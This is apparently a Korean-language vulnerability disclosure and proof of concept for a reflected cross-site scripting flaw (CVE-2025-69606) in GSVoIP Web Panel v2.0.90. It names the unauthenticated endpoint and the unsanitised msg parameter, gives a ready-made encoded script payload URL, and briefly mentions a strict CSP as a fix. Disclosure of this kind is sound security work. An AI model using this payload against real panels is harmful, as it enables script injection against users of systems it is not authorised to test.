
# GSVoIP 웹 패널 v2.0.90 반사형 XSS 취약점(CVE-2025-69606) 개념 증명 GSVoIP 웹 패널 v2.0.90의 반사형 XSS 취약점(CVE-2025-69606)에 대한 개념 증명으로, `msg` 매개변수를 통한 인증되지 않은 임의 JavaScript 실행을 시연합니다.
| 필드 | 세부 사항 |
|---|
| 제품 | GSVoIP Web Panel |
| 버전 | 2.0.90 (이전 버전도 가능) |
| 공급업체 | Solutions VoIP (GS Solutions) |
| CWE | CWE-79 — 교차 사이트 스크립팅 |
| 공격 경로 | 원격 / 네트워크 |
| 인증 | 필요하지 않음 |
GET /painel/gateways.php/error?msg=<payload>
msg 매개변수가 HTML 응답에 그대로 반영되며, 삭제(정화)나 출력 인코딩이 적용되지 않습니다.
https://{TARGET}/painel/gateways.php/error?msg=%3Cscript%3Ealert(1)%3C%2Fscript%3E
디코딩됨:
<script>alert(1)</script>
조작된 URL에 접근하면, 삽입된 페이로드가 피해자의 브라우저에서 실행됩니다:
alert(1)
msg 매개변수에 XSS 페이로드가 포함된 악성 URL을 만듭니다.script-src 지시문이 포함된 엄격한 CSP를 구현하십시오.| 단계 | 이벤트 |
|---|---|
| 1 | 취약점 발견 및 Luiz Eduardo에 의해 보고됨 |
| 2 | CVE 할당: CVE-2025-69606 |
| 3 | 공개 공개 |
Luiz Eduardo에 의해 발견 및 보고됨
CVE-2025-69606 · CWE-79 · GSVoIP Web Panel v2.0.90